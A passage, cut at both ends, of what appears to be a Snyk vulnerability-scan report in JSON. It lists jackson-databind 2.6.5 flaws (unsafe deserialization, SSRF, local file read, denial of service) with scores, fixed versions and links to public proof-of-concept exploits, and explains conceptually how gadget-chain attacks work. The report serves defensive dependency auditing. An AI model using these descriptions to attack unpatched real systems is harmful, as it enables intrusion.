"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": 
"primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-18T17:23:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:17.193594Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9)", + "[2.8.0,2.8.11.4)", + "[2.7.0,2.7.9.6)", + "[,2.6.7.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9", + "2.8.11.4", + "2.7.9.6", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using MySQL database" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2326", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9", + "title": "Github Release Tag" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12086", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:47:31.553438Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:55.897269Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:31.553438Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.785293Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint, the service has the mysql-connector-java jar in the classpath. An attacker can host a crafted MySQL server reachable by the victim and send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs due to missing `com.mysql.cj.jdbc.admin.MiniAdmin` validation.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9, 2.8.11.4, 2.7.9.6, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/dda513bd7251b4f32b7b60b1c13740e3b5a43024)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2326)\n- [Github Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.9)\n- [PoC](https://github.com/Al1ex/CVE-2019-12086)\n", + "epssDetails": { + "percentile": "0.74218", + "probability": "0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." 
+ }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
